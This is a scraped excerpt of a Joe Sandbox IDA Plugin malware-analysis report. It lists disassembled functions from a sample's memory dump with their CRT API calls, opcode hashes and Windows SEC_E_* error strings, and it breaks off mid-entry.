Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: ErrorLast_errno$__swprintf_lstrncpy
String ID: SEC_E_MAX_REFERRALS_EXCEEDED
API String ID: 2544740495-13904994
Opcode ID: cac80be5a4ba4d762a92130ed4b54ef93ca636ca5feb911ae1e24dd292b28958
Instruction ID: d28b1a47c06bc0fb01f62bdd1bcc26b558a53ac08845a9549d367a743184861a
Opcode Fuzzy Hash: cac80be5a4ba4d762a92130ed4b54ef93ca636ca5feb911ae1e24dd292b28958
Instruction Fuzzy Hash: 9101EC2560D94696F755BB61A0142BCE311AF5CBA5FC50075CA2E077D1CF3C9449A2A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D12FE6 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 32stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F8D1336B
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D1337D
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F8D1338A
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F8D13395
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F8D1339E
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F8D133AA

Strings

SEC_E_MESSAGE_ALTERED, xrefs: 00007FF7F8D12FE6

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: ErrorLast_errno$__swprintf_lstrncpy
String ID: SEC_E_MESSAGE_ALTERED
API String ID: 2544740495-4024968056
Opcode ID: abc3dd77ed88e2fd31289fd170f195664378ce8317f7e657f6191725c78530d8
Instruction ID: 9b62dc0c5e1da1c468bea7cc67da442848c82bca2fec08e220bde66edee44041
Opcode Fuzzy Hash: abc3dd77ed88e2fd31289fd170f195664378ce8317f7e657f6191725c78530d8
Instruction Fuzzy Hash: 8D01EC2560D94696F755BB61A0182BCE311AF5CBA5FC50075CA2E067D1CF3C9449A2A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D12FF2 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 32stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F8D1336B
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D1337D
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F8D1338A
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F8D13395
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F8D1339E
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F8D133AA

Strings

SEC_E_MULTIPLE_ACCOUNTS, xrefs: 00007FF7F8D12FF2

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: ErrorLast_errno$__swprintf_lstrncpy
String ID: SEC_E_MULTIPLE_ACCOUNTS
API String ID: 2544740495-2625018790
Opcode ID: 18d7a77bb6eebb0e19f7b2d1c9ab3b1f5a5b8084e8ea0c9812bd04e9ab14fa2e
Instruction ID: 8c8fc346427adab258358bc3ec701ed7c4aaa4dbc245f2a8e33c95857b7987cf
Opcode Fuzzy Hash: 18d7a77bb6eebb0e19f7b2d1c9ab3b1f5a5b8084e8ea0c9812bd04e9ab14fa2e
Instruction Fuzzy Hash: 4C01EC2560D94696F755BF61A0142BCE311AF5CBA5FC50075CA2E067D1CF3C9449A2B8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D12FC2 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 32stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F8D1336B
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D1337D
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F8D1338A
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F8D13395
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F8D1339E
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F8D133AA

Strings

SEC_E_KDC_UNKNOWN_ETYPE, xrefs: 00007FF7F8D12FC2

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: ErrorLast_errno$__swprintf_lstrncpy
String ID: SEC_E_KDC_UNKNOWN_ETYPE
API String ID: 2544740495-184080383
Opcode ID: 37f0b87a7b8ac81de243454854b6969c8a8f2aad8e75a53d304b9d3690034cd3
Instruction ID: 7daa5e74aeeecb588189eecaefc52918b6b71daf1a7f719e026d2400063f2f3c
Opcode Fuzzy Hash: 37f0b87a7b8ac81de243454854b6969c8a8f2aad8e75a53d304b9d3690034cd3
Instruction Fuzzy Hash: 6701EC2560D94696F755BB61A0142BCE311AF5CBA5FC50075CA2E067D1CF3CA449A2A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D12FCE Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 32stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F8D1336B
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D1337D
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F8D1338A
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F8D13395
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F8D1339E
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F8D133AA

Strings

SEC_E_LOGON_DENIED, xrefs: 00007FF7F8D12FCE

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: ErrorLast_errno$__swprintf_lstrncpy
String ID: SEC_E_LOGON_DENIED
API String ID: 2544740495-2665946957
Opcode ID: f43a57241183239cece5b793cfea69be0413d2116ab62fab1d12fe4b137df0e0
Instruction ID: 54b3b6d459ab105741904f2982dd42b4f73deea5cd05f61a4b35ac9ee1cd7a15
Opcode Fuzzy Hash: f43a57241183239cece5b793cfea69be0413d2116ab62fab1d12fe4b137df0e0
Instruction Fuzzy Hash: E801EC2560D94696F755BF61A0142BCE311AF5CBA5FC50075CA2E067D1CF3C9449A2A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D12F9E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 32stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F8D1336B
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D1337D
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F8D1338A
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F8D13395
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F8D1339E
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F8D133AA

Strings

SEC_E_KDC_CERT_REVOKED, xrefs: 00007FF7F8D12F9E

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: ErrorLast_errno$__swprintf_lstrncpy
String ID: SEC_E_KDC_CERT_REVOKED
API String ID: 2544740495-410780751
Opcode ID: 06811764f3b15f07d1accc6c1b2c435b04b4650dd90b25866e0913bc58556fe9
Instruction ID: 6ed841f12600b785770e014355a293a334ef9e67a6a2c987d2e77ffc657ecda2
Opcode Fuzzy Hash: 06811764f3b15f07d1accc6c1b2c435b04b4650dd90b25866e0913bc58556fe9
Instruction Fuzzy Hash: BE012C2560D94296F755BB61A0142BCE311AF5CBA1FC50075CA2E027D1CF3C9449A2A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D12FAA Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 32stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F8D1336B
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D1337D
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F8D1338A
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F8D13395
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F8D1339E
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F8D133AA

Strings

SEC_E_KDC_INVALID_REQUEST, xrefs: 00007FF7F8D12FAA

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: ErrorLast_errno$__swprintf_lstrncpy
String ID: SEC_E_KDC_INVALID_REQUEST
API String ID: 2544740495-4010066767
Opcode ID: 7e9ddc52939405fedee23a66ab38f39949c95864dac535fe1b15fed4bfb17f9b
Instruction ID: b314e0c29d83152fba2450447c3269c81b4368186ccb1824cc9a3a88c3089fb3
Opcode Fuzzy Hash: 7e9ddc52939405fedee23a66ab38f39949c95864dac535fe1b15fed4bfb17f9b
Instruction Fuzzy Hash: B401FF2560D94696F755BF61A0142BCE311AF5CBA5FC50075CE2E077D1CF3C9449A3B8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D12FB6 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 32stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F8D1336B
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D1337D
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F8D1338A
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F8D13395
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F8D1339E
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F8D133AA

Strings

SEC_E_KDC_UNABLE_TO_REFER, xrefs: 00007FF7F8D12FB6

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: ErrorLast_errno$__swprintf_lstrncpy
String ID: SEC_E_KDC_UNABLE_TO_REFER
API String ID: 2544740495-2113599717
Opcode ID: e4f320c011a8c28e3f79da50965ec0080bfa5048a0d0e5248695ad92d96ca9a4
Instruction ID: 3c9d1c9c370d243cefd7548f904bd862854056a09247ac598253cd111e43cffe
Opcode Fuzzy Hash: e4f320c011a8c28e3f79da50965ec0080bfa5048a0d0e5248695ad92d96ca9a4
Instruction Fuzzy Hash: ED01FF2560D94696F755BF61A0142BCE311AF5CBA5FC50075CE2E077D1CF3C9449A3B8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D12F7A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 32stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F8D1336B
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D1337D
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F8D1338A
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F8D13395
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F8D1339E
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F8D133AA

Strings

SEC_E_ISSUING_CA_UNTRUSTED, xrefs: 00007FF7F8D12F7A

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: ErrorLast_errno$__swprintf_lstrncpy
String ID: SEC_E_ISSUING_CA_UNTRUSTED
API String ID: 2544740495-2997121769
Opcode ID: 0c8bdd05eb0abf6e797be60cda9dc7242f506c2ebcf1c191d72ccd25157d944d
Instruction ID: 86a07f4a31fc90a311b92e383f3a71d8f652819fc0a21476c77cf6475fa63b83
Opcode Fuzzy Hash: 0c8bdd05eb0abf6e797be60cda9dc7242f506c2ebcf1c191d72ccd25157d944d
Instruction Fuzzy Hash: 9901FF2560D94696F755BF61A0182BCE311AF5CBA5FC50075CE2E077D1CF3C9449A3B8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D12F86 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 32stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F8D1336B
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D1337D
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F8D1338A
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F8D13395
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F8D1339E
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F8D133AA

Strings

SEC_E_ISSUING_CA_UNTRUSTED_KDC, xrefs: 00007FF7F8D12F86

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: ErrorLast_errno$__swprintf_lstrncpy
String ID: SEC_E_ISSUING_CA_UNTRUSTED_KDC
API String ID: 2544740495-2787320099
Opcode ID: 134ad07d3c7260d8763d07645703fbc15f7095cc89f6e0e63e274dce7e0c0391
Instruction ID: d1c355c7536b6a85294dcbc208172b71842e20b4f40967aee76b3c56df1fe9b2
Opcode Fuzzy Hash: 134ad07d3c7260d8763d07645703fbc15f7095cc89f6e0e63e274dce7e0c0391
Instruction Fuzzy Hash: 6E01EC25A0D94696F755BB61A0142BCE311AF5CBA5FC50075CA2E067D1CF3CA449A2A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D12F92 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 32stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F8D1336B
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D1337D
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F8D1338A
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F8D13395
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F8D1339E
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F8D133AA

Strings

SEC_E_KDC_CERT_EXPIRED, xrefs: 00007FF7F8D12F92

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: ErrorLast_errno$__swprintf_lstrncpy
String ID: SEC_E_KDC_CERT_EXPIRED
API String ID: 2544740495-3163653577
Opcode ID: 6a3c47a4c65ba20f766b26a128b371bad881487c514825d21d0e4adfb707a855
Instruction ID: cf8d4b35e0cfd2b4f7115bbd1082f6c516926da3eff638d35cd6fff390bc3a88
Opcode Fuzzy Hash: 6a3c47a4c65ba20f766b26a128b371bad881487c514825d21d0e4adfb707a855
Instruction Fuzzy Hash: 3701EC2560D94696F755BB61A0142BCE321AF5CBA5FC50075CA2E067D1CF3C9449A2A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D129D9 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 24stringCOMMON

Download Yara Rule

APIs

strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BA6
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BB2
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BBC
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BC4
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BD0

Strings

Connection was aborted, xrefs: 00007FF7F8D129D9

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: ErrorLast_errno$strncpy
String ID: Connection was aborted
API String ID: 4135170618-4252434314
Opcode ID: 83a56e0cd3224e774aef809c3f02de0d5c596042167190ff4607cf459eec38c8
Instruction ID: 43733abd53ce41e31fd5d58e04d7a2360f627e419547a7580942fb4a75740f0d
Opcode Fuzzy Hash: 83a56e0cd3224e774aef809c3f02de0d5c596042167190ff4607cf459eec38c8
Instruction Fuzzy Hash: 86F01D25A0DA4696E750AF65A504129F321FF5CB95F880071DA6E03BD4CF3DE888A7A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D129E5 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 24stringCOMMON

Download Yara Rule

APIs

strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BA6
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BB2
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BBC
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BC4
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BD0

Strings

Connection was reset, xrefs: 00007FF7F8D129E5

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: ErrorLast_errno$strncpy
String ID: Connection was reset
API String ID: 4135170618-3362216063
Opcode ID: 248e41a5f6b3ea74a7719f1a4c249f52006d73b2fda99c4bc667b5e531727a37
Instruction ID: dcc70dcaf6c661978b7ef0fd0b67c15f086b863cfa0df2c6a8232e8d8247ffdc
Opcode Fuzzy Hash: 248e41a5f6b3ea74a7719f1a4c249f52006d73b2fda99c4bc667b5e531727a37
Instruction Fuzzy Hash: E6F01D25A0DA4696E750AF65A504129F321FF5CBD5F880071DA6E03BD4CF3DE848E7A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D129C1 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 24stringCOMMON

Download Yara Rule

APIs

strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BA6
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BB2
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BBC
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BC4
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BD0

Strings

Network unreachable, xrefs: 00007FF7F8D129C1

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: ErrorLast_errno$strncpy
String ID: Network unreachable
API String ID: 4135170618-3916218534
Opcode ID: 1b2f63783f7f4d7d40b0cd45d0fdc32aaf6d288aacb99f12aa01e653bada01e5
Instruction ID: 335d0cf8258b3c40518a9235c1bd9c33e83957b00a220abb94e67a0d781a9b3f
Opcode Fuzzy Hash: 1b2f63783f7f4d7d40b0cd45d0fdc32aaf6d288aacb99f12aa01e653bada01e5
Instruction Fuzzy Hash: 90F01725A0DA4686E740BF61A504129F321FF5CB95F880071DA6E03BD4CF3DE888A7A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D129CD Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 24stringCOMMON

Download Yara Rule

APIs

strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BA6
